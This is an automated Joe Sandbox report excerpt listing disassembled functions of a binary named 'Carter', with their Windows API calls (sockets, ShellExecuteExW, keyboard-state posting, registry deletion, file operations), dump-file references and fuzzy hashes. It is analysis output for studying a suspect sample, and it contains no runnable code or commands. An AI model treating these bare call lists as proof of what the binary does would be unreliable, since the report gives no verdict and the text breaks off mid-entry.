Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

Part of subcall function 00C0436A: _wcscpy.LIBCMT ref: 00C0438D

_wcstok.LIBCMT ref: 00C5F2D7
_wcscpy.LIBCMT ref: 00C5F366
_memset.LIBCMT ref: 00C5F399

Strings

X, xrefs: 00C5F3D6

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: c0298c4ef7ab50fa6ec15888a2b7ed2e36b3d15592e242573ea6dc6d35e981f2
Instruction ID: ef98b6f22a9dda0a74ee361b34db7ff0d04c0ab88b122e90ac6294c8ac6c5a2e
Opcode Fuzzy Hash: c0298c4ef7ab50fa6ec15888a2b7ed2e36b3d15592e242573ea6dc6d35e981f2
Instruction Fuzzy Hash: 4DC1AE745043419FD728EF24C881A6FB7E4BF85310F04492DF999872A2DB30ED8ADB86

Function 00C671EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C672EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C6730C
WSAGetLastError.WSOCK32(00000000), ref: 00C6731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00C673D5
inet_ntoa.WSOCK32(?), ref: 00C67392

Part of subcall function 00C4B4EA: _strlen.LIBCMT ref: 00C4B4F4
Part of subcall function 00C4B4EA: _memmove.LIBCMT ref: 00C4B516

_strlen.LIBCMT ref: 00C6742F
_memmove.LIBCMT ref: 00C67498

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: dfef46ba1367bf4e25bc6371d325ca089ec4eb40591ed13fa6bea1e5ed6b8ea5
Instruction ID: 3f759bacb05e81f8c23d23f3c14c9534ecac79e09c711a84d739ff492176a350
Opcode Fuzzy Hash: dfef46ba1367bf4e25bc6371d325ca089ec4eb40591ed13fa6bea1e5ed6b8ea5
Instruction Fuzzy Hash: 7481AF71108204ABD320EB24DCD6E7BB7E8AF84718F144A18FA569B292DB70DE45CB91

Function 00BF1800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83daca5e391863f0ab1b800b4746f58fc34db633e75259153317b20ad8e36445
Instruction ID: 45c162f6a53e6495fd59e7ce2affc59768f51ce59defab455738016258e8a198
Opcode Fuzzy Hash: 83daca5e391863f0ab1b800b4746f58fc34db633e75259153317b20ad8e36445
Instruction Fuzzy Hash: 90717E70900109EFCB04DF59CD88EBEBBB9FF85310F248999FA15AB251C7309A55DBA0

Function 00C7B9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01455498), ref: 00C7BA5D
IsWindowEnabled.USER32(01455498), ref: 00C7BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C7BB4D
SendMessageW.USER32(01455498,000000B0,?,?), ref: 00C7BB84
IsDlgButtonChecked.USER32(?,?), ref: 00C7BBC1
GetWindowLongW.USER32(01455498,000000EC), ref: 00C7BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C7BBFB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 9a7bff08bbe384da956a4329e676b9bae8db2e7ee83b6b9e3333d1660c2664f3
Instruction ID: f8be1fbdc9be9f973e5f1ea9260082c4e67032837384a8f163fa922a5fed06ba
Opcode Fuzzy Hash: 9a7bff08bbe384da956a4329e676b9bae8db2e7ee83b6b9e3333d1660c2664f3
Instruction Fuzzy Hash: 2971AD34604604AFDB21AF54C8D5FFABBB9EF49310F108159FD69972A1CB31AE50EB60

Function 00C6FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C6FB31
_memset.LIBCMT ref: 00C6FBFA
ShellExecuteExW.SHELL32(?), ref: 00C6FC3F

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

Part of subcall function 00C0436A: _wcscpy.LIBCMT ref: 00C0438D

GetProcessId.KERNEL32(00000000), ref: 00C6FCB6
CloseHandle.KERNEL32(00000000), ref: 00C6FCE5

Strings

@, xrefs: 00C6FC0E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 8bb8b0f1e2dd591d330f8a31e3ceca70a4d1e69875e2c3c67339fbbc0ef5b729
Instruction ID: 4b2c1a4456b7f23d11e82941cbef53f7e6b1a91eb8bb1d4d150c0c75fdef7b63
Opcode Fuzzy Hash: 8bb8b0f1e2dd591d330f8a31e3ceca70a4d1e69875e2c3c67339fbbc0ef5b729
Instruction Fuzzy Hash: CA61BF74A00619DFCB24EF94D4909AEB7F4FF49310F1484ADE916AB351CB30AE46CB90

Function 00C5174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C5178B
GetKeyboardState.USER32(?), ref: 00C517A0
SetKeyboardState.USER32(?), ref: 00C51801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C5182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C5184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C51894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C518B7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: d7e62edc7d350e44ca4b8355c85e6202a4ce44f9e73789567f6a59f45a222ec4
Instruction ID: 76097f7d8da2c4e3166255b6e32d23f2ee92e9f439effb8c974dfcf3f8b0ad0a
Opcode Fuzzy Hash: d7e62edc7d350e44ca4b8355c85e6202a4ce44f9e73789567f6a59f45a222ec4
Instruction Fuzzy Hash: 0551E4649047D53DFB324238CC49BBA7EE95B06706F0C8589ECE5458C2C298AECCD758

Function 00C51565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C515A4
GetKeyboardState.USER32(?), ref: 00C515B9
SetKeyboardState.USER32(?), ref: 00C5161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C51646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C51663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C516A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C516C8

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: ca1ad8dc3c47b7a5ef31f8d1076b21fbc78e6fe47ae9ec223dbe379aed2ca758
Instruction ID: 994d315335ba5e7c68b8e9cce59ce9250d8bfb0e25f392ff647d10317b2bcc80
Opcode Fuzzy Hash: ca1ad8dc3c47b7a5ef31f8d1076b21fbc78e6fe47ae9ec223dbe379aed2ca758
Instruction Fuzzy Hash: 945106A45447D13DFB3283248C49BBA7EA99B45301F0C4589FCE5468C2D6A4EECCE758

Function 00C55BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C55BC5
_wcsncpy.LIBCMT ref: 00C55BFA
_wcsncpy.LIBCMT ref: 00C55C2C
_wcsncpy.LIBCMT ref: 00C55C5F
_wcsncpy.LIBCMT ref: 00C55CA1
_wcsncpy.LIBCMT ref: 00C55CDB
_wcsncpy.LIBCMT ref: 00C55D0A

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: d366f8c7b5ef959e7f645b6c215f153a52d81a3d4301db575c419ab77b932ca5
Instruction ID: fe604fdc2ae67003ec6af3465983ebf9ab3ef0c5e2c7613edd43f3ae22eca7f2
Opcode Fuzzy Hash: d366f8c7b5ef959e7f645b6c215f153a52d81a3d4301db575c419ab77b932ca5
Instruction Fuzzy Hash: 3D41827AC1065875CB11FBF4CC469CFB3B8AF06311F504856F919E3111E634A7A9E3A9

Function 00C53B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C53B8A,?), ref: 00C54BE0

Part of subcall function 00C54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C53B8A,?), ref: 00C54BF9

lstrcmpiW.KERNEL32(?,?), ref: 00C53BAA
_wcscmp.LIBCMT ref: 00C53BC6
MoveFileW.KERNEL32(?,?), ref: 00C53BDE
_wcscat.LIBCMT ref: 00C53C26
SHFileOperationW.SHELL32(?), ref: 00C53C92

Strings

\*.*, xrefs: 00C53C20

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 76a1175215113e2897d598d2612a0f43cac55b63576a4632343095aa017f91eb
Instruction ID: ece84e7bede9c846691631fec7ed9e512fd13c4555120ef986cf4789978d6cad
Opcode Fuzzy Hash: 76a1175215113e2897d598d2612a0f43cac55b63576a4632343095aa017f91eb
Instruction Fuzzy Hash: 1941907550C3849AC752EB64C441ADBB7E8AF89381F50092EF88AC3191EB34D7CCD75A

Function 00C778B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C778CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77976
IsMenu.USER32(?), ref: 00C7798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C779D6
DrawMenuBar.USER32 ref: 00C779E9

Strings

0, xrefs: 00C778C3

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: f8fb20841ac920e6a055d4dbaef8eee5411f0749a402c3cac32e5467a408c9fc
Instruction ID: 95b63558f3113456a0fddfbdf596d65ac1e5b85fc65b6fd7012e1c6c6d83373d
Opcode Fuzzy Hash: f8fb20841ac920e6a055d4dbaef8eee5411f0749a402c3cac32e5467a408c9fc
Instruction Fuzzy Hash: F3413875A05209EFDB10DF54D884E9EBBF5FB09310F048229EA59A7250D730AE54CFA0

Function 00C71602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00C71631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7165B
FreeLibrary.KERNEL32(00000000), ref: 00C71712

Part of subcall function 00C71602: RegCloseKey.ADVAPI32(?), ref: 00C71678
Part of subcall function 00C71602: FreeLibrary.KERNEL32(?), ref: 00C716CA
Part of subcall function 00C71602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C716ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C716B5

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: b5ef68154d52bcd91822565d4639add854ed4d75a7dc36cc5a9af6083cca1193
Instruction ID: af09c5735ce6ca329cdf4785dee59cad176e1aaaf5be9352b6e94c3df5a09da3
Opcode Fuzzy Hash: b5ef68154d52bcd91822565d4639add854ed4d75a7dc36cc5a9af6083cca1193
Instruction Fuzzy Hash: EE314BB1900109BFDB149B94DC89FFEB7BCEF08350F144169F916A2151EB70AF499BA4

Function 00C768F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C76911
GetWindowLongW.USER32(01455498,000000F0), ref: 00C76944
GetWindowLongW.USER32(01455498,000000F0), ref: 00C76979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C769AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C769D5
GetWindowLongW.USER32(?,000000F0), ref: 00C769E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C76A00

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: c59acda36fb7ef24ac6a45837dcd80e58af088f4acfb3ebc8af1714b59326618
Instruction ID: a3c7c0515119c41dc73cc3ed3e61237513fb58dbb49524fa92458ca3fc8fa2b1
Opcode Fuzzy Hash: c59acda36fb7ef24ac6a45837dcd80e58af088f4acfb3ebc8af1714b59326618
Instruction Fuzzy Hash: 13312A306045519FDB21CF19DC88F6937E1FB89710F2982A4FA199F2B2DB72AD44DB50

Function 00C4E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E2F0
SysAllocString.OLEAUT32(00000000), ref: 00C4E2F3
SysAllocString.OLEAUT32(?), ref: 00C4E311
SysFreeString.OLEAUT32(?), ref: 00C4E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E33F
SysAllocString.OLEAUT32(?), ref: 00C4E34D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2bd0744c36e841101debea4496367cda62a122f04f1255ce0648997f3cd55e53
Instruction ID: 3583e3804d29af5687b51425e419e3f42371b1ac91159c60e9d1a3c393e8dd3a
Opcode Fuzzy Hash: 2bd0744c36e841101debea4496367cda62a122f04f1255ce0648997f3cd55e53
Instruction Fuzzy Hash: BF21A132600219AF9F50DFA8CC88DBF73ACFF09360B158125FA14DB260D670AD858B64

Function 00C6685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C684A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C668B1
WSAGetLastError.WSOCK32(00000000), ref: 00C668C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C668F9
connect.WSOCK32(00000000,?,00000010), ref: 00C66902
WSAGetLastError.WSOCK32 ref: 00C6690C
closesocket.WSOCK32(00000000), ref: 00C66935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00C6694E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: c30b43c6f775d8f5af73312b8e79c13bdf598ce92770b9e9a349cc31a95b4990
Instruction ID: 6341cfb80c4592c458b9cb0b85f909cdbc04463044328354f7e2c098ba0f6a79
Opcode Fuzzy Hash: c30b43c6f775d8f5af73312b8e79c13bdf598ce92770b9e9a349cc31a95b4990
Instruction Fuzzy Hash: 9A31C471600208AFDB209F64CCC5BBE77E9EF44721F144169FE16AB2D1CB74AD488BA1

Function 00C4E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E3CB
SysAllocString.OLEAUT32(00000000), ref: 00C4E3CE
SysAllocString.OLEAUT32 ref: 00C4E3EF
SysFreeString.OLEAUT32 ref: 00C4E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E412
SysAllocString.OLEAUT32(?), ref: 00C4E420

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 15e960f64840b0bf61eea8d25898a7a9cbaca39f2f95d2961ffd596d3b5c65a6
Instruction ID: 04d53468f34780ada2da7661d6d3acbca0787f5569525b37afa54941738d2a63
Opcode Fuzzy Hash: 15e960f64840b0bf61eea8d25898a7a9cbaca39f2f95d2961ffd596d3b5c65a6
Instruction Fuzzy Hash: F4218835604108AF9B509FE8DC88DAF77ECFF4D360B118525FA15CB260D670ED859B64

Function 00C77BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
Part of subcall function 00BF2111: GetStockObject.GDI32(00000011), ref: 00BF2163
Part of subcall function 00BF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C77C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C77C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C77C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C77C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C77C8A

Strings

Msctls_Progress32, xrefs: 00C77C28

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c67af19a75d39f0db6d68b09e46e7344b1cbb029a312d2381fbd7b264e670636
Instruction ID: 51480bf5d81b584e9949a803f0f90700734f2a691a2bc76ac8c41f74496fb09d
